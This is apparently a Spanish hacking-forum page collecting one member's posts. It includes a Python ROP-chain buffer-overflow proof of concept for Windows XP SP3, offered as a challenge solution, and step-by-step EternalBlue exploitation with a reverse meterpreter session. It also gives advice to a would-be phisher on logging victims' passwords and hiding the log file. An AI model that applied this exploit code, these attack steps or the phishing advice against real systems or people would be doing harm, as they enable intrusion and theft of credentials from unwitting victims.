This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - .:UND3R:.

Pages: [1] 2 3 ... 7
1
You are not allowed to view links. Register or Login
parchado , ojala saquen otros exploits o descubran otros nuevos

Y por que no creas tú tus propios exploits?

Saludos

2
Wargames y retos / Re:Reto Genera Tu Exploit!
« on: March 22, 2018, 03:21:11 am »
Han pasado 6 años y tan solo dos participantes han entregado una solución, por lo cual he decidido publicar la mía por si alguien le puede mejorar y así aprendemos todos. El tamaño del payload es de 80 bytes existiendo un límite de 175 caracteres permitidos para poder realizar un BoF normal en vez de un BoF SEH (el cual en mi sistema no pude encontrar ROP Gadgets que permitieran saltar de SEH a nSEH con DEP activado).

Imágenes

Ejecución de la calculadora


Ejecución de CMD

PoC programado en Python
Code: (python) You are not allowed to view links. Register or Login
# Operating system = Microsoft Windows XP Profesional Version 2002 Service Pack 3
# Language         = Spanish
# Author           = UND3R
# Size             = 80 bytes
# WinExec(calc, -1)

import struct
from struct import pack

junk = 'A' * 44
eip = pack("<I",0x7c91120f) # ntdll.dll | RETN
rop1 = pack("<I",0x7c912486) # ntdll.dll | POP EDI / RETN
rop2 = pack("<I",0x7c91120f) # ntdll.dll | RETN
rop3 = pack("<I",0x7c911d52) # ntdll.dll | POP ESI / RETN
rop4 = pack("<I",0x7c8623ad) # kernel32.dll | WinExec
rop5 = pack("<I",0x7c80dfdd) # kernel32.dll | POP EBX / RETN
rop6 = pack("<I",0xffffffff)
rop7 = pack("<I",0x7c95d22b) # ntdll.dll | PUSHAD / RETN
rop8 = 'calc'

payload = junk + eip + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8

f = open('config.txt', 'w')
f.write(payload)
f.close()

Espero que les haya gustado mi ROP Gadgets, saludos

.:UND3R:.

3
Excelente artículo, qué versión de gblic haz usado para demostrar el unlink()? Pues la macro unlink actualmente verifica la lista de bins doblemente enlazada y en caso de no haber continuidad se alerta una corrupción en el heap, saludos

4
Dudas y pedidos generales / Re:Ayuda con ingeniería social.
« on: March 21, 2018, 04:09:18 pm »
Podrías comenzar estudiando Javascript, sabiendo hacer un hola mundo, posterior aprendiendo a programar PHP, no es necesario recibir los datos ingresados por la vícitma por email, pues requerirías configurar el servidor SMTP en el servidor en donde haz montado la página de phising, no es mejor almacenar la clave en un .log o .txt y denegar el acceso frente a curiosos o robots por medio de directivas dentro de un archivo .htaccess?

Saludos

5
Dudas y pedidos generales / Re:Sugerencias de Proxy free
« on: March 21, 2018, 04:07:19 pm »
Creo que aquellas que permiten hacer Crwaler desde lenguajes de script para poder hacer varias tareas de forma cómoda y sencilla:
You are not allowed to view links. Register or Login

Saludos

6
Dudas y pedidos generales / Re:algun metodo para spread?
« on: March 21, 2018, 04:05:56 pm »
Comienza especificando en donde deseas hacer el spread, cual es la intención, alcance, etc.

Probaste usando google? Pues yo quiero hacer hacking me ayudarías? Mi pregunta es exactamente igual de incoherente y des-informada que la tuya

Saludos

7
Dudas y pedidos generales / Re:soquetes en python :)
« on: March 21, 2018, 04:03:52 pm »
¿No sería mejor utilizar BurpSuite? y poner directivas al estilo:
- Si la URL de destino es X y su contenido dentro de la petición POST es Y hacer Z

Acepta REGEX, para hacer que todos pasen por el, podrías hacer un envenenamiento de red o configurar el proxy en el computador a comprometer de forma local o con algún script que lo haga de forma automatizada

8
Dudas y pedidos generales / Re:eternalblue fuera y dentro de lan dudas
« on: March 21, 2018, 04:01:29 pm »
Eternal blue es un fallo del protocolo SMB v1.0 el cual para chequear si es vulnerable el puerto 445 debería estar abierto, esto permitiría inyectar el payload el cual ocasionaría controlar a tu merced el ordenador comprometido, por lo cual podrías subir una DLL al proceso comprometido con eternalblue (dentro del mismo framework con el cual usas eternalblue) eligiendo una dll creada con Empire Framework, tras inyectar la dll (puerto 445) esta se conectará al puerto que tu estimes conveniente (ese deberá estar abierto y es el puerto de TU ROUTER no del PC comprometido), recibiendo la sesión en Empire Framework ya puedes migrarte a meterpreter.

En resumen:
- El objetivo debe tener puerto 445 para explotar eternablue
- El objetivo no debe filtrar las conexiones salientes (algo muy común en las configuraciones de firewall pues bloquean conexiones entrantes en vez de las salientes, a excepción de que se hayan implementado políticas o que existan IPS o IDS, aunque estos ya mitigarían eternalblue)
- Abrir el puerto con el cual escucharás la conexión inversa.
- Disfrutar de forma responsable un meterpreter


9
Todos deben ser .rb, deben contener la clase MetasploitModule y además estos son cargados durante el inicio de msfconsole, por lo cual si los haz copiado y pegado a mitad del prompt de Metasploit deberías cerrar y abrir nuevamente el framework.

Como dato adicional durante el proceso de carga, en caso de que el exploit presente errores o advertencias, en la consola de msfconsole se te es notificado.

Saludos

10
Hola a todos, dejo a disposición lo que será una serie de video tutoriales sobre la introducción al Exploiting en Windows x86/32 bits. Estos videos tutoriales se basan en los tutoriales de Corelan

Lista de reproducción de Youtube


Lista de Youtube:


-- Descargas de programas utilizados, PDF y más.
t.me/joinchat/AAAAAErnQOBjWnVHv2UKlg

Dudas o consultas
Pueden hacerlas en este post.

Saludos

11
El primer exploit liberado no cubría varias plataformas, por lo que entiendo se rediseño para el framework metasploit

12
Bugs y Exploits / Re:NSA Tools Kit Remote Explotation
« on: March 13, 2018, 01:05:25 am »
You are not allowed to view links. Register or Login
Hola estas herramientas se corren  con metasploit?

No, es un framework desarrollado por NSA (por lo menos eso dicen) que explota el fallo de seguridad MS-17-010 de Windows el cual se aprovecha de un fallo en el protocolo SMB v1.0, este fallo de seguridad dentro del Framework tiene como nombre EternalBlue.

Cabe mencionar que este framework corre en plataformas windows con Python. Lo he testeado y funciona correctamente, los otros plugins o exploits existentes en el frameworks no los he experimentado pero aun así podría asegurar que son funcionales.

Saludos

PD: Si mal no me equivoco existe un exploit para metasploit, pero se limita la cantidad de objetivos, el EternalBlue se encuentra más elaborado en relación al que circula por Internet.

PD2: Puedes usar scripts de nmap para verificar si el host es susceptible a este tipo de exploits, saludos

13
Dudas y pedidos generales / Re:MSSQL Vulnerable y no lo detecto
« on: February 27, 2018, 03:23:58 am »
Tal como comentan tienes que estar seguro que tras instalar el gestor de base de datos, tienes habilitada la opción de recibir conexiones remotas:




Fuente de las imágenes (Microsoft)

También debes saber que como directiva de seguridad el usuario sa, usuario por defecto, bloquea las conexiones entrantes tras cierta cantidad de intentos (mecanismo de protección anti-bruteforce)

Saludos

14
Dudas y pedidos generales / Re:Eliminar null en un hola mundo en nasm
« on: February 27, 2018, 03:14:09 am »
Code: (asm) You are not allowed to view links. Register or Login
movabs rsi,0x6000dc
Modifiquemos un poco este valor: 0x006000dc

Code: You are not allowed to view links. Register or Login
0x006000dc + 0x11111111 = 0x117111ED
Podrías hacer esto:
Code: (asm) You are not allowed to view links. Register or Login
mov rsi, 0x117111ED
sub rsi, 0x11111111

Saludos

EDIT: Con respecto a eso de "usar" no te entendí muy bien pero en realidad tanto RBP como RSP su usan.

RSP siempre apunta a la cima del stack, mientras que RBP es utilizado como Frame Pointer (epílogo y prólogo):

15
Dudas y pedidos generales / Re:Problema con un archivo win.rar
« on: February 21, 2016, 12:22:34 am »
Lamentablemente Winrar utilizar el cifrado AES, el cual la única forma de crackear es utilizando fuerza bruta.

16
Dudas y pedidos generales / Re:Responser.py
« on: January 02, 2016, 09:20:48 pm »
Si ya ejecutaste el script con sudo, pues sí o sí debes tener los puertos en uso, prueba con un nmap a localhost o service apache stop (asumiendo que tienes como servicio a Apache)

Saludos

17
Code: You are not allowed to view links. Register or Login
def main():
    # my code here

if __name__ == "__main__":
    main()


18
Debes poner la máquina virtual con tipo de conexión en puente, saludos.

19
Dudas y pedidos generales / Re:Problemas con CrackMe
« on: December 18, 2015, 02:34:31 am »
El crackme esát programa en C# por lo cual requieres un decompilador de tal lenguaje como reflector, saludos.

20
Ingeniería Inversa / Re:Memory Hacking Software
« on: December 17, 2015, 04:19:16 am »
Excelente aporte, cabe destacar que Cheat engine es código abierto, por lo cual si estamos preocupados por la detección de este, basta con comenzar a modificar su código de fuente, saludos.

Pages: [1] 2 3 ... 7